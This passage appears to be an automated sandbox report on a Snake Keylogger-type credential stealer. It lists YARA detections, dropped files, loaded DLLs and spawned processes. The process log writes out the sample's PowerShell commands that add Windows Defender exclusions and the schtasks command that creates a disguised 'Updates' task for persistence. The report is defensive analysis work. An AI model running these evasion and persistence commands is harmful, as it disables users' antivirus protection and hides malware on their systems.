                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0166437120_2_01664371
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_016625F820_2_016625F8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_01662CE020_2_01662CE0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_01668CE020_2_01668CE0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0166114820_2_01661148
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_016633C820_2_016633C8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0166183020_2_01661830
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_01663AB020_2_01663AB0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_01661F1020_2_01661F10
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_016603F020_2_016603F0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_016625E820_2_016625E8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0166040020_2_01660400
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_01660DD020_2_01660DD0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_01662CD020_2_01662CD0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_01660C9E20_2_01660C9E
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0166113C20_2_0166113C
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_016633BA20_2_016633BA
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0166182120_2_01661821
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_01663AA020_2_01663AA0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_01661EFF20_2_01661EFF
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032E536220_2_032E5362
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032ED27820_2_032ED278
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032E711820_2_032E7118
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032EC14720_2_032EC147
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032EA08820_2_032EA088
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032EC73820_2_032EC738
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032EC46820_2_032EC468
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032ECA0820_2_032ECA08
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032E69A020_2_032E69A0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032EE98820_2_032EE988
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032ECFAB20_2_032ECFAB
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032ECCD820_2_032ECCD8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032E3A9920_2_032E3A99
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032EE97B20_2_032EE97B
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032EF97420_2_032EF974
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032E29E020_2_032E29E0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_032E3E0920_2_032E3E09
                      Source: Ti5nuRV7y4.exe, 00000000.00000002.1309507329.000000000303D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Ti5nuRV7y4.exe
                      Source: Ti5nuRV7y4.exe, 00000000.00000002.1316105655.0000000007340000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Ti5nuRV7y4.exe
                      Source: Ti5nuRV7y4.exe, 00000000.00000002.1302634124.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ti5nuRV7y4.exe
                      Source: Ti5nuRV7y4.exe, 00000000.00000000.1243582673.0000000000BDC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePfkm.exe" vs Ti5nuRV7y4.exe
                      Source: Ti5nuRV7y4.exe, 00000000.00000002.1317731899.0000000007660000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Ti5nuRV7y4.exe
                      Source: Ti5nuRV7y4.exe, 00000000.00000002.1316404680.00000000073BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowe6 vs Ti5nuRV7y4.exe
                      Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Ti5nuRV7y4.exe
                      Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Ti5nuRV7y4.exe
                      Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Ti5nuRV7y4.exe
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3696172047.00000000010F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Ti5nuRV7y4.exe
                      Source: Ti5nuRV7y4.exeBinary or memory string: OriginalFilenamePfkm.exe" vs Ti5nuRV7y4.exe
                      Source: Ti5nuRV7y4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: Ti5nuRV7y4.exe PID: 792, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Ti5nuRV7y4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: aoTiGLRa.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ti5nuRV7y4.exe.7340000.3.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, e9vnVJvXef3cnAd7TZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, IVgKmK05cbPEb74WYZ.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, IVgKmK05cbPEb74WYZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, IVgKmK05cbPEb74WYZ.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, IVgKmK05cbPEb74WYZ.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, IVgKmK05cbPEb74WYZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, IVgKmK05cbPEb74WYZ.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, e9vnVJvXef3cnAd7TZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@4/4
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeFile created: C:\Users\user\AppData\Roaming\aoTiGLRa.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2064:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5884:120:WilError_03
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD06F.tmpJump to behavior
                      Source: Ti5nuRV7y4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Ti5nuRV7y4.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.000000000348A000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003447000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003465000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003497000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003457000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000035B6000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000035EA000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000035A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: Ti5nuRV7y4.exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeFile read: C:\Users\user\Desktop\Ti5nuRV7y4.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Ti5nuRV7y4.exe "C:\Users\user\Desktop\Ti5nuRV7y4.exe"
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Users\user\Desktop\Ti5nuRV7y4.exe "C:\Users\user\Desktop\Ti5nuRV7y4.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\aoTiGLRa.exe C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess created: C:\Users\user\AppData\Roaming\aoTiGLRa.exe "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess created: C:\Users\user\Desktop\Ti5nuRV7y4.exe "C:\Users\user\Desktop\Ti5nuRV7y4.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess created: C:\Users\user\AppData\Roaming\aoTiGLRa.exe "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
